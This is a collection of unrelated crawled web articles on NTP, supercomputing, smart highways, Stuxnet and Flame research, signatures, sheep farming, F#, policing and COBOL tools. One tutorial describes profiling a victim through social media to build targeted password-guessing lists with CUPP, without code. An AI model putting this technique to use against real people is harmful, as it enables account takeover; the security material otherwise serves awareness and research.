The question of which time source to point to is an interesting one. As with many things related to the Internet, time servers are maintained, added to, and amended by people and organizations on a voluntary basis. As such, neither the availability nor the accuracy of the servers and/or service is guaranteed. It would be easy to assume that the Stratum-1 time sources are completely accurate, but it's not always the case. A survey conducted by individuals at MIT in 1999 found that a large number of the Stratum-1 servers were issuing the wrong timein one case, by over six years!
Setting Up NTP
Setting Up an NTP Time Server
Synchronizing your systems with one of these public time servers may be appropriate if all your systems have access to a public NTP time server, but in practicality it may not be possible. A more reliable, secure, and self-sufficient option is to create a reference time server of your own, and then use it to provide time to servers across your enterprise. To create an NTP time server, you will first need a mechanism for ascertaining accurate time, such as a radio receiver or GPS time receiver. These devices commonly come as either plug-in expansion cards or as external devices that plug into the RS-232 port on the system in question. Prices start at a few hundred dollars and go up from there. Using these devices, the local clock on the system is kept accurate. NTP software can then be used to communicate this time to the operating system and other servers.
Although time serving is designed to be a low-overhead service, if you have many clients who will require synchronization, consider creating a dedicated time server or purchasing a purpose-made time server in a box system. The only drawback is that these can easily cost in excess of $5,000. This strategy may sound expensive, but when you consider the money often invested in other areas of network management and resilience, it is still quite reasonable.
As systems become more and more distributed, the importance of having accurate time across the enterprise will increase accordingly. Network Time Protocol fulfills this need in a relatively simple and easy to implement manner. //
Drew Bird (MCT, MCNI) is a freelance instructor and technical writer. He has been working in the IT industry for 12 years and currently lives in Kelowna, B.C., Canada. You can e-mail Drew at firstname.lastname@example.org. | <urn:uuid:0017ee08-3721-49cf-b9ac-c4c1a1e09ebb> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/625401/NTP-Its-About-Time.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00335-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951888 | 1,437 | 3.15625 | 3 |
Dec. 13 — A £2 million investment has increased the capability and power of the state-of-the-art BlueCrystal High Performance Computer (HPC) facility, which allows over 650 researchers and students to process vast amounts of complex data at record speeds.
Supercomputers are seen as the ‘third pillar’ of modern research and within the University are used in areas such as climate research, earth science, drug discovery, mathematics, physics, molecular modelling and aerospace engineering.
The University has invested £12 million in its Advanced Computing facilities since 2006, making it one of the country’s leading centres.
The latest BlueCrystal system will be five times as powerful as its predecessor and the upgrade is a result of a collaboration with ClusterVision and Dell.
Dr. Ian Stewart, Director of the University’s Advanced Computing Research Centre, said, “This new machine underscores the far-sighted commitment to HPC by the University and reinforces Bristol’s position as one of the leading centres for HPC in the UK.”
“It will provide the robust, scalable and innovative platform required to meet the diverse interests and requirements of our world class research community. Having a supercomputer of this size contributes significantly to University research income and will play an increasingly important role in teaching.”
Major users include climatologists in the School of Geographical Sciences who are developing models to predict climate change. These models require huge amounts of computing power and disk space, with a typical simulation taking months to run and generating terabytes of model output.
Such models will help to identify where in the world may be at the highest risk of flooding. It also contributes to the ability of climate scientists to monitor ice sheets in the Antarctic.
Another important area of research which will benefit from the HPC’s capabilities is Social and Community Medicine, with the globally recognised Children of the 90s long-term health research project increasingly needing to analyse vast quantities of data collected from the 14,000 mothers enrolled during pregnancy in 1991 and 1992 and their resulting family.
It’s hoped that the new supercomputer will be a resource for the whole city, with opportunities for small businesses and schools to have access.
Furthermore, the University has been working alongside its partners to offer new opportunities to students, plugging the current skills gap in HPC through internships, placements, sponsorship and guest lectures.
ClusterVision has supplied, delivered and installed the Dell based system with other elements sourced from a variety of vendors including Bright Computing, Intel, NVIDIA, Panasas and Allinea.
Mark Allsopp, UK Country Manager for ClusterVision, said, “ClusterVision is proud to build on our long relationship with the University of Bristol’s Advanced Computing Research Centre. We look forward to working with the University to continue exploring how the latest technology in computing, storage and software can be brought together to provide a significant computational and scientific advantage for the University of Bristol and the wider South West region.”
Dr Stephen Wheat, Intel’s General Manager for HPC, said, “Intel is delighted to be chosen as the supplier of choice for the University of Bristol’s new BlueCrystal High Performance Computer. Bristol and Intel have a strong and positive history on the deployment of Xeon processor based systems to meet Bristol’s extreme computing demands.”
“Bristol’s choice to base their next generation computational workhorse on the latest Intel Xeon E5-2600 processor and Intel Xeon Phi co-processor, all interconnected with Intel True Scale fabric, provides a state-of-the-art multi-core and many-core computing platform to extend their positive experience well into the future with Intel Inside.”
David Lecomber, CEO of Allinea Software, said, “The BlueCrystal system provides a platform that will deliver breakthrough results through the development of advanced software models and we are delighted that our software tools and training will be a part of enabling this progress.”
Bart Mellenbergh, Director of HPC Solutions in EMEA at Dell, said, “The University of Bristol is an important partner for Dell in the UK high-performance technical computing space. We will work with the University to help their students to better develop their skills in HPC and achieve success.”
“Dell will also support the University’s initiatives to make HPC accessible to the mid-market segment of UK industry. We are extremely excited about teaming the University’s students, energy and knowhow and Dell’s technology and market reach to make a positive impact on the UK high-tech economy.”
Source: University of Bristol | <urn:uuid:e8cdeb4a-3311-47e4-9a4b-1d4c928b6c35> | CC-MAIN-2017-04 | https://www.hpcwire.com/off-the-wire/bristol-utilize-bluecrystal-system-research/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00335-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.930455 | 972 | 2.515625 | 3 |
There are a lot of social engineering techniques that you can try in order to retrieve personal information from users that can help you to identify their passwords.However people have different personalities like many people are not willing to talk to strangers about the so as penetration tester that performs social engineering attacks you may find some obstacles.
Not all the people are open for discussions so there will be times that you may unable to retrieve the information that you want.So the only thing that you can do is to have a good password list related to the interests of this person.
The aim of the CUPP is to generate common passwords based on the input that you will give for your target.For example:
- Pet name
Of course these information could be found on the social profiles of the victims like Facebook,Twitter,Linkedin etc.
To start CUPP you need to execute the commands below:
You can see in the image below the options that you have when you start the program:
When we have as much information as possible for the interests,names,nicknames,hobbies etc of our victim it is time to use the cupp in order to fill in the information that we have for the creation of the password list.
Except of the information you can choose also if the list will include and leet words or random numbers at the end of the words,special characters and keywords.
Now the CUPP has generate the password list and we can use it in order to see if any password on the list is valid.
Most common passwords are birthdays,names,interests,mobile numbers and generally events from people’s real life.The reason behind that is of course that people need to use something that they can remember especially in nowadays that everyone possess many accounts.
CUPP proves that sharing details in the social media or with someone who is not your friend could be dangerous.Besides social engineering is a very effective way for malicious users to discover passwords fast so it is a very common attack.
So every user must know that the choice of the passwords is very important and something that needs constantly evaluation.CUPP generates passwords from users social life so in order to avoid having our password to someone’s CUPP wordlist we can share false information to the social media or we should choose passwords that are irrelevant from our real life events. | <urn:uuid:123446b9-6911-4914-97fe-539547f369dc> | CC-MAIN-2017-04 | https://pentestlab.blog/2012/03/06/common-user-passwords-profiler/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00061-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.941652 | 483 | 2.78125 | 3 |
Two Dutch design firms are developing a “Smart Highway” to test new technologies that could someday become common parts of roadway infrastructure around the world, Gizmag reported.
The test site, developed by Studio Roosegaarde and Heijmans Infrastructure, features roads with glow-in-the-dark paint, dynamic lighting and lanes that can charge electric cars.
There are five main new technologies that will be used to create the “Route 66 of the future,” according to the firms. “Dynamic Paint” is temperature sensitive paint that is transparent most of the time, but when it becomes cold enough to create hazards like black ice, the paint reveals warning symbols on the road.
Glow-in-the-dark paint, which absorbs energy from the sun and can glow in the dark for up to 10 hours, would replace reflective or ordinary paint used to form lanes on most roads.
Interactive lighting uses sensors to detect when vehicles approach. The difference between these sensors and those already found on the roads in some places is that the brightness of the light can adjust based on how far away a car is from the light, growing brighter as a car approaches and dimmer as a car leaves. Similarly, a “wind light” uses the wind created by a moving vehicle to power pinwheel generators connected to road lights.
An “induction priority lane” for electric cars uses underground induction coils to charge vehicles as they drive down the lane. A prototype of the road is expected to be operational sometime in 2013.
All images courtesy of Studio Roosegaarde | <urn:uuid:fd10ddb8-6acf-4681-ad2f-ca0293ccc294> | CC-MAIN-2017-04 | http://www.govtech.com/transportation/Smart-Highways-Glow-in-the-Dark.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00363-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946723 | 325 | 2.9375 | 3 |
The discovery of the Flame malware in May 2012 revealed the most complex cyber-weapon to date. At the time of its discovery, there was no strong evidence of Flame being developed by the same team that delivered Stuxnet and Duqu. The approach to the development of Flame and Duqu/Stuxnet was different as well, which lead to the conclusion that these projects were created by separate teams. However, the following in-depth research, conducted by Kaspersky Lab’s experts, reveals that these teams in fact cooperated at least once during the early stages of development.
- Kaspersky Lab discovered that a module from the early 2009-version of Stuxnet, known as “Resource 207,” was actually a Flame plugin.
- This means that when the Stuxnet worm was created in the beginning of 2009, the Flame platform already existed, and that in 2009, the source code of at least one module of Flame was used in Stuxnet.
- This module was used to spread the infection via USB drives. The code of the USB drive infection mechanism is identical in Flame and Stuxnet.
- The Flame module in Stuxnet also exploited a vulnerability which was unknown at the time and which enabled escalation of privileges, presumably MS09-025.
- Subsequently, the Flame plugin module was removed from Stuxnet in 2010 and replaced by several different modules that utilized new vulnerabilities.
- Starting from 2010, the two development teams worked independently, with the only suspected cooperation taking place in terms of exchanging the know-how about the new “zero-day” vulnerabilities.
Stuxnet was the first cyber-weapon targeting industrial facilities. The fact that Stuxnet also infected regular PCs worldwide led to its discovery in June 2010, although the earliest known version of the malicious program was created one year before that. The next example of a cyber-weapon, now known as Duqu, was found in September 2011. Unlike Stuxnet, the main task of the Duqu Trojan was to serve as a backdoor to the infected system and steal private information (cyber-espionage).
During the analysis of Duqu, strong similarities were discovered with Stuxnet, which revealed that the two cyber-weapons were created using the same attack platform known as the “Tilded Platform”. The name originated from the preferences of the malware developers for filenames of the form “~d*.*” – hence, “Tilde-d”. The Flame malware, discovered in May 2012 following the investigation prompted by International Communications Union (ITU) and conducted by Kaspersky Lab, was, at first sight, entirely different. Some features, such as the size of the malicious program, the use of LUA programming language and its diverse functionality all indicated that Flame was not connected to Duqu or Stuxnet’s creators. However, the new facts that have emerged completely rewrite the history of Stuxnet and prove without a doubt, that the “Tilded” platform is indeed connected to the Flame platform.
The earliest known version of Stuxnet, supposedly created in June 2009, contains a special module known as “Resource 207”. In the subsequent 2010 version of Stuxnet this module was completely removed. The “Resource 207” module is an encrypted DLL file and it contains an executable file that’s the size of 351,768 bytes with the name “atmpsvcn.ocx”. This particular file, as it is now revealed by Kaspersky Lab’s investigation, has a lot in common with the code used in Flame. The list of striking resemblances includes the names of mutually exclusive objects, the algorithm used to decrypt strings, and the similar approaches to file naming.
More than that, most sections of code appear to be identical or similar in the respective Stuxnet and Flame modules, which leads to the conclusion that the exchange between Flame and the Duqu/Stuxnet teams was done in a form of source code (i.e. not in binary form). The primary functionality of the Stuxnet “Resource 207” module was distributing the infection from one machine to another, using the removable USB drives and exploiting the vulnerability in Windows kernel to obtain escalation of privileges within the system. The code which is responsible for distribution of malware using USB drives is completely identical to the one used in Flame.
Alexander Gostev, Chief Security Expert, Kaspersky Lab, comments: “Despite the newly discovered facts, we are confident that Flame and Tilded are completely different platforms, used to develop multiple cyber-weapons. They each have different architectures with their own unique tricks that were used to infect systems and execute primary tasks. The projects were indeed separate and independent from each other. However, the new findings that reveal how the teams shared source code of at least one module in the early stages of development prove that the groups cooperated at least once. What we have found is very strong evidence that Stuxnet/Duqu and Flame cyber-weapons are connected”.
Further details about the investigation can be found in the article at Securelist.com. To learn more about Flame malware refer to the Flame FAQ prepared by Kaspersky Lab’s security researchers. | <urn:uuid:c2cbaa95-4e33-4bfb-a96e-9ca737adffd1> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/virus/2012/Resource_207_Kaspersky_Lab_Research_Proves_that_Stuxnet_and_Flame_Developers_are_Connected | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00299-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964872 | 1,095 | 2.703125 | 3 |
Just four years ago most schools had policies against devices in classrooms. The typical way for teachers to deal with smartphones and devices was banning their usage in class. School policy was to force students to leave phones and iPads at the door of the classroom so as not to disrupt lessons or other students. It was a fearful subject for teachers to address. How would teachers know what students were doing on their phones? How would they keep kids engaged in learning when they could access the internet, facebook, and text their friends?
Even more frustrating was the fact that unless smart phones and other devices were confiscated upon the start of class, students would continuously try to sneak peeks at their phones at all times of the day. This posed even further disruption to learning. Fast forward to 2015 – students are not only allowed to have their own devices, Chromebooks and iPads are given to them for classroom use! OR, even more crazy options are enlisted such as allowing students to bring in their own devices for classroom use and mandating that they be incorporated into classroom instruction. A lot has changed!
It takes years of experience for teachers to nail down lesson plans that engage students while incorporating the required course curriculum, competencies, and instructional benchmarks. Perfecting a lesson that engages students, teaches effectively, and produces good results is no easy feat. Teachers don’t have time to revise tried and true means of lesson delivery to include the use of internet-connected devices. But that is what is happening in schools today as districts are adopting BYOD policies and buying up Chromebooks in droves.
If your district has adopted BYOD policies or purchased a gaggle of iPads for student use, here are some helpful resources to assist teachers in coping with the intrusiveness of these new technology happenings:
Device inclusive lesson plans
One of the biggest issues that teachers have with having a classroom full of smartphone touting students is altering their lesson plans to include the usage of them. Adjusting lessons to include new activities takes time, and goodness knows time is at a premium for teachers. To help with this districts can compile a list of resources available for teachers to work from to revise lesson plans to include technology. Here are some examples:
A strong IT maintenance policy
In order for teachers to feel comfortable with the usage of Chromebooks, iPads, smartphones and other handheld devices in their classrooms it is imperative that school districts set up an ironclad IT maintenance policy. Teachers need to know that there are resources for properly maintaining the devices that are now incorporated into their lessons. Nothing is more frustrating than beginning a lesson only to have 3 or 4 students with devices that aren’t working. This can cause distractions that are nearly impossible to defuse.
To alter maintenance policies to include BYOD and handheld devices, IT departments need to:
Getting parent buy in
The more parents know about school technology usage for learning, the better. Give parents as much information as possible about why and what technology items students are using, how they are using it, and what parents can do to reinforce technology learning, rules and resources with their children. If technology usage at home is congruent with the classroom there are less headaches for all.
When implementing new devices in classrooms many public schools are creating technology education portals on their websites for parents access such as these:
Educating students on proper usage
Especially in schools that purchase personal technology devices, educating students on proper usage is of utmost importance. The more students are educated on why and how devices can be used to properly enhance education, the better the experience will be. Don’t assume that students know how to use a device. On average children are 12 years old when they receive their first smartphone from parents. But schools are providing iPads and Chromebooks to children younger than that on a regular basis these days. This means that there are many children who are only getting access to devices in the classroom. They need to learn how to use them properly for learning so that there are as few distractions as possible due to improper use.
Device monitoring solutions
Perhaps the most encompassing of all needs to reduce the intrusiveness of personal technology devices in the classroom is the ability to monitor what each student is doing on said device at all times. Providing teachers with the peace of mind that students’ activities on smartphones, laptops and tablets allows them to focus on the most important of tasks; engaging students in learning. Having software running in the background that logs websites, apps, and conversations going on gives teachers the freedom to keep on teaching without continuously looking over students shoulders. This is probably the single most important key to implementing devices into every classroom. Impero Education Pro is a great solution for monitoring devices of all kinds. Contact us for more information on our classroom management solutions. | <urn:uuid:c14e5c9a-42b7-432c-b761-b6950d8ccf19> | CC-MAIN-2017-04 | https://www.imperosoftware.com/5-ways-to-help-teachers-cope-with-the-intrusiveness-of-devices-in-the-classroom/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281331.15/warc/CC-MAIN-20170116095121-00537-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.972281 | 965 | 3.140625 | 3 |
7.5 What is a fail-stop signature scheme?
A fail-stop signature scheme is a type of signature devised by van Heyst and Pederson [VP92] to protect against the possibility that an enemy may be able to forge a person's signature. It is a variation of the one-time signature scheme (see Question 7.7), in which only a single message can be signed and protected by a given key at a time. The scheme is based on the discrete logarithm problem. In particular, if an enemy can forge a signature, then the actual signer can prove that forgery has taken place by demonstrating the solution of a supposedly hard problem. Thus the forger's ability to solve that problem is transferred to the actual signer.
The term ``fail-stop'' refers to the fact that a signer can detect and stop failures, that is, forgeries. Note that if the enemy obtains an actual copy of the signer's private key, forgery cannot be detected. What the scheme detects are forgeries based on cryptanalysis.
- 7.1 What is probabilistic encryption?
- Contribution Agreements: Draft 1
- Contribution Agreements: Draft 2
- 7.2 What are special signature schemes?
- 7.3 What is a blind signature scheme?
- Contribution Agreements: Draft 3
- Contribution Agreements: Final
- 7.4 What is a designated confirmer signature?
- 7.5 What is a fail-stop signature scheme?
- 7.6 What is a group signature?
- 7.7 What is a one-time signature scheme?
- 7.8 What is an undeniable signature scheme?
- 7.9 What are on-line/off-line signatures?
- 7.10 What is OAEP?
- 7.11 What is digital timestamping?
- 7.12 What is key recovery?
- 7.13 What are LEAFs?
- 7.14 What is PSS/PSS-R?
- 7.15 What are covert channels?
- 7.16 What are proactive security techniques?
- 7.17 What is quantum computing?
- 7.18 What is quantum cryptography?
- 7.19 What is DNA computing?
- 7.20 What are biometric techniques?
- 7.21 What is tamper-resistant hardware?
- 7.22 How are hardware devices made tamper-resistant? | <urn:uuid:95751c24-03f5-4781-a81c-35748b6d7ede> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/what-is-a-fail-stop-signature-scheme.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00353-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.903868 | 518 | 2.9375 | 3 |
Selmi H.,Departement des science et Techniques des Productions Animales |
Rekik B.,Departement des science et Techniques des Productions Animales |
Dkhil A.,Institute Of Recherche Veterinaire Of Tunisie |
Gara A.B.,Departement des science et Techniques des Productions Animales |
And 3 more authors.
Livestock Research for Rural Development | Year: 2010
The improvement of sheep production systems in the Fahs region necessitates a diagnosis of the current situation and a thorough analysis of management practices. To meet these objectives, 110 farms having the Barbarine meat breed from the region were surveyed. The analysis of gathered data revealed that the region is characterized by familial farming (91.8% of farms are small sized: 0 to 24.7 acres) held by middle age farmers (45.5% were 35 to 55 years old) of which 80% are illiterate or at most have attended primary school). The total sample size of animal was 2059. Animals were lodged in traditional and are mostly fed on pasture and by-products, and supplemented occasionally by concentrate during critical physiological stages. The overall management of the Barbarine breed seemed unsatisfactory with indicators below common accepted performances. In fact, 80% of farmers practice shearing on pregnant ewes, a long breeding period without the ram effect, and do not respect the sex- ratio. The lambing period was then unnecessary long (July-December) with a peak in October (53.6%). The analysis of reproduction performances showed that farms may be classified into two categories: The first class of 19% of herds had 90%, 9.23% and 14.4% rates for fertility, sterility and abortion, respectively; and the second class with 113, 108 and 9.23 for prolificacy, fecundity and young mortality, respectively. Net income varied from 18.4 TD to 126 DT/ewe indicating important differences in management practices among farmers. Source | <urn:uuid:9a340d4f-adb5-4dda-931a-d8e9d84b3d0f> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/departement-des-science-et-techniques-des-productions-animales-1632101/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00197-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920887 | 408 | 2.578125 | 3 |
Called F#, the meta language is designed to solve extensibility issues and problems on the .NET Framework. Meta languages are used for writing tools and compilers, programs that translate source code into object code, or a computer's machine language.
CAML, from which F# is derived, is a meta language that was developed by INRIA, a French research institute for computer science. One type of CAML is Objective CAML, which is used for teaching programming.
F# was forged to address those problems for .NET programmers. The language, written by Don Syme, of Microsoft Research's Cambridge, U.K., team, joins the software giant's family of programming languages, including C++, C# and J#.
"I believe that it is reasonable to innovate with syntax and semantics in order to increase the usability of a programming language," Syme said on the Microsoft research site.
As is common with new programming languages, debate was widespread and fierce on developer-oriented sites as Slashdot.org. One argument is that functional compilers already exist on the market to convert Standard ML onto the .NET framework, such as SML.NET. But Microsoft contends that it wants to make F# work seamlessly with C#, Visual Basic, SML.NET and other .NET programming languages.
The notion that Microsoft is standardizing another language, as it has with C++ and C#, is the major source of contention for those who have come to distrust Microsoft in the wake of antitrust concerns that came to a head in U.S. courts a few years ago.
One anonymous slashdot poster, distressed by the news, said: "I guess anyone taking computer science will have to learn this, as it is the 'language of the future.' MS has the power to dictate what the future of its monopoly is, and thus also the future of computing. And with computer science graduates familiar with this, they will start to use it. Then, others like myself will either have to learn it or lose their job."
Another rebutted that tack: "F# will be learned by people when managers and not university lecturers decide that it is something that coders need to learn or even when coders decide it's necessary for something. Stop thinking that the world is out to make you use MS products no matter what. The businesses that do the employment and the people who should be advising them (cough -you- cough) are the people who make those decisions."
Microsoft could not be reached for comment as of press time, but analysts familiar with Microsoft's adventures in programming discussed the issue. Stephen O'Grady, of Redmonk, considered the possibility that Microsoft's purpose may be less than altruistic, but downplayed it.
"Does Microsoft intend to modify ML for its own purposes? Sure, but some would call that optimizing for the platform and the framework," O'Grady said. "People do this all the time -- SAP in the past has added its own custom classes to JSP libraries, and BEA introduced a proprietary format for its Workshop product in the .JWS extension (although the latter's been submitted as a standard to the JCP). And as for C++ and C#, I haven't noticed that they exactly put C out of business."
O'Grady said it is possible that developers may have to get used to Microsoft's version of meta language in F#.
"But I'd say that's not exactly a near horizon threat. Plus it's likely that if it becomes perceived as a threat, the Java community will develop CAML or Standard ML plugins to something like the Eclipse framework, if in fact they're not available already."
ZapThink Senior Analyst Ronald Schmelzer was less concerned about Microsoft's intentions. He noted that Microsoft is known for doing research on a variety of topics that may never see the light of day as a product, and "this might be one of them."
"However, I don't think there is cause for alarm here. Microsoft was one of the original creators of XML, and things like SOAP and BPEL, so why would they dump it? By and large, this looks to be a focused research project by an individual or a small group exploring the topic of how to produce better compiled languages. I don't see any indication that this would replace C, C#, C++, Java, or any other language that Microsoft supports. In fact, the Microsoft CLR that forms the basis of the .NET runtime explicitly supports things like new languages and F# might just be one of those."
But does the programming world need another # language from Microsoft?
"Probably not at the moment, but this doesn't look to be an immediately productized offering. Instead, they've used this implementation obviously to offer .NET programmers an ML based language to work from if that's suitable, but just as much to prove it can be implemented in short order (less than 10K lines of code, apparently)," O'Grady said.
F# isn't the only language Microsoft is working on, although details about an "X#" are rather murky. X# is rumored to be a language focused on more intelligent processing of things like XML documents, much like ClearMethods' Water language, but there have been denials that the company is working on this. | <urn:uuid:cf54cf1d-f860-4847-83bc-92eaa764afa6> | CC-MAIN-2017-04 | http://www.cioupdate.com/trends/article.php/2211971/Is-F-a-Major-or-Minor-Consideration-for-Microsoft.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280364.67/warc/CC-MAIN-20170116095120-00346-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.968187 | 1,101 | 2.953125 | 3 |
What is Community Policing?
“Community policing is a philosophy that promotes organizational strategies that support the systematic use of partnerships and problem-solving techniques to proactively address the immediate conditions that give rise to public safety issues such as crime, social disorder, and fear of crime.”
Community Policing Defined Report from Community Oriented Policing Services (COPS) from the US Department of Justice
History Of Community Policing
The concept of community policing has be around for a long time and in the US it can be traced as far back as the 19th century. The primary purpose for its inception was to have police engaging with communities to build strong relationships between its members and law enforcement. One of the earliest and major tactics of community policing involved officers going on foot patrols through the neighborhoods they serve. In today's modern era, this has evolved to departments incorporating social media and/or community engagement systems to share relevant local information with residents. It has been an integral strategy for cities who have looked to combat violence, drugs and other criminal activities.
Only 17% of US residents age 16 and up have had a face-to-face interaction with a police officer
Only 40% of property crimes and 47% of violent crimes are reported to police
Implementing Community Policing
According to Strategies for Community Policing, common implementations of community policing include:
- Relying on community-based crime prevention by utilizing civilian education, neighborhood watch, and a variety of other techniques, as opposed to relying solely on police patrols.
- Re-structuralizing of patrol from an emergency response based system to emphasizing proactive techniques such as foot patrol.
- Increased officer accountability to civilians they are supposed to serve.
- Decentralizing the police authority, allowing more discretion amongst lower-ranking officers, and more initiative expected from them.
“Applying community policing techniques backed by the principles of ethical policing will produce a notable correlation between the collaborative relationship that will be fostered and a palatable decline in crime.”
Jon Gaskins, PoliceOne
Community Policing Analysis
A 2014 study published in the Journal of Experimental Criminology, “Community-Oriented Policing to Reduce Crime, Disorder and Fear and Increase Satisfaction and Legitimacy among Citizens: A Systematic Review,” systematically reviewed and synthesized the existing research on community-oriented policing to identify its effects on crime, disorder, fear, citizen satisfaction, and police legitimacy.
The study found:
- Community-policing strategies reduce individuals’ perception of disorderly conduct and increase citizen satisfaction.
- In studying 65 independent assessments that measured outcomes before and after community-oriented policing strategies were introduced, they found 27 instances where community-oriented policing was associated with 5% to 10% greater odds of reduced crime.
- 16 of the 65 comparisons showed community-oriented policing was associated with a 24% increase in the odds of citizens perceiving improvements in disorderly conduct.
- 23 comparisons measured citizen satisfaction with police, and found that community-oriented programs were effective almost 80% of the cases, and citizens were almost 40% more likely to be satisfied with the work of the police.
Although this study was not definitive, it provides important evidence for the benefits of community policing for improving perceptions of the police. The overall findings are ambiguous, and show there is a need to explicate and test a logic model that explains how short-term benefits of community policing, like improved citizen satisfaction, relate to longer-term crime prevention effects, and to identify the policing strategies that benefit most from community participation.
Why Everbridge for Improved Community Policing
Control Public Information Dissemination
Maintain complete power and control to author messages and disseminate information to the public at will.
Easy Resident Text Opt-In
Easily increase resident opt-in’s at an exponential rate. Maintain a robust database of resident contact information to foster a community dialogue or provide effective emergency notifications.
A Force Multiplier
Publish and distribute public information at scale, with the push of one button, via social media, websites, email, text, mobile app, and Google Alerts. Leverage residents to act as force multiplier to assist in preventing and solving crime. Ideal when internal resources are limited.
Precise Neighborhood Targeting
The most precise neighborhood-level geographic targeting system available. Send messages to specific communities or neighborhoods.
Focus on Public Safety
The most trusted public safety product on the market, as used by over 8,000 public safety agencies. Completely focused on helping agencies keep residents safe and informed. | <urn:uuid:961fefa7-7e71-4c33-903d-314058746f16> | CC-MAIN-2017-04 | https://www.everbridge.com/community-policing/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00070-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9404 | 944 | 3.375 | 3 |
Military Transformers: 20 Innovative Defense TechnologiesDepartment of Defense technologies under development, from brainy microchips to battlefield transformer vehicles, promise to make the U.S. military more nimble. Here's a visual tour of 20 breakthrough ideas.
11 of 20
Can a computer chip mimic the human brain? That's the goal of DARPA's Systems of Neuromorphic Adaptive Plastic Scalable Electronics (SyNAPSE) program, which aims to develop systems that not only mimic the brain, but do so at biological scale. That requires development of integrated circuits that are packed with electronics and integrated communications that approximate the function of neurons and synapses. The ultimate goal is to build systems that "understand, adapt, and respond" to information, says DARPA. Potential uses include robotic systems and sensory applications.
Top 10 Open Government Websites
U.S. Military Robots Of The Future: Visual Tour
NASA's Next Mission: Deep Space
NASA's Blue Marble: 40 Years Of Earth Images
DOD Mobile App Eases Transition To Civilian Life
Army Aids Wounded Warriors With Mobile App
Army Eyes Monitoring Tools To Stop Wikileaks Repeat
10 Lessons From Leading Government CIOs
14 Cool Mobile Apps From Uncle Sam
11 Epic Technology Disasters
11 of 20 | <urn:uuid:9a02b736-79f2-40e4-8cfe-286ef1fcbb10> | CC-MAIN-2017-04 | http://www.darkreading.com/risk-management/military-transformers-20-innovative-defense-technologies/d/d-id/1104353?page_number=11 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280086.25/warc/CC-MAIN-20170116095120-00282-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.822198 | 263 | 2.578125 | 3 |
Accelerators, like NVIDIA Tesla GPUs and Intel Xeon Phi coprocessors, made a big splash this year at SC13 as these highly parallel number-crunchers carved out a significant presence on both the TOP500 and Green500 charts, but there’s another promising use for accelerators, according to Fermilab researcher Wenji Wu: network monitoring.
Traditional network analysis tools have struggled to keep pace with the traffic demands as network bandwidth has skyrocketed. Adding to the strain, network administrators expect to be able to examine packets in real-time.
Wu, a network researcher at the U.S. Department of Energy’s Fermi National Accelerator Laboratory, believes that GPUs may offer some advantages over the current technology, which employs CPUs and ASICs. He delivered a paper presentation at SC13 last month, describing his research using off-the-shelf NVIDIA GPUs as network monitors in high-speed networks. According to Wu and his team, graphics chips are well-suited to the task.
Wu affirms that GPUs have “a great parallel execution model.” They offer high compute power, ample memory bandwidth, easy programmability, and can divvy up the processing duties into parallel tasks.
The Fermilab team, under Wu’s direction, built a prototype GPU-accelerated network performance monitoring system called G-NetMon to support large-scale scientific collaborations. The G-NetMon system consists of two 8-core 2.4 Ghz AMD Opteron 6136 processors, two Gbps Ethernet interfaces, 32 GB of system memory and one Tesla C2070 Fermi GPU.
“Our system exploits the data parallelism that exists within network flow data to provide fast analysis of bulk data movement between Fermilab and collaboration sites,” notes Wu. “Experiments demonstrate that our G-NetMon can rapidly detect sub-optimal bulk data movements.”
G-NetMon was designed to handle current network loads and also be able to accommodate expected future traffic demands. An experiment showed that the GPU-based prototype was between nine to 17 times faster than a single-core CPU. When compared to a six-core CPU, the GPU setup was about 1.5 times to 3 times faster. The next step for the researchers is to add some security features. | <urn:uuid:ba8edfff-06d3-4cbd-bfb5-23987c95f70b> | CC-MAIN-2017-04 | https://www.hpcwire.com/2013/12/02/gpus-ease-network-monitoring-chore/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280425.43/warc/CC-MAIN-20170116095120-00190-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.925925 | 488 | 2.5625 | 3 |
Eclipse is created by an Open Source community and is used in several different areas, e.g. as a development environment for Java or Android applications. Eclipse roots go back to 2001. The prime objectives of this course are to provide the developer with a practical working knowledge of how the development and testing of COBOL applications can be effectively used on the Workstation, using the Micro Focus Eclipse development tools.
Micro Focus Visual COBOL is a contemporary development suite that allows developers to maintain, develop and modernize your applications. Visual COBOL for Studio is an Integrated Development Environment (IDE) for many languages. These include Visual Basic, Visual C#, Visual C++ and COBOL. Micro Focus has provided extensive functionality to provide a Visual Studio development environment for COBOL applications. This also enables the integration of COBOL Programming with the other Visual Studio supported languages.
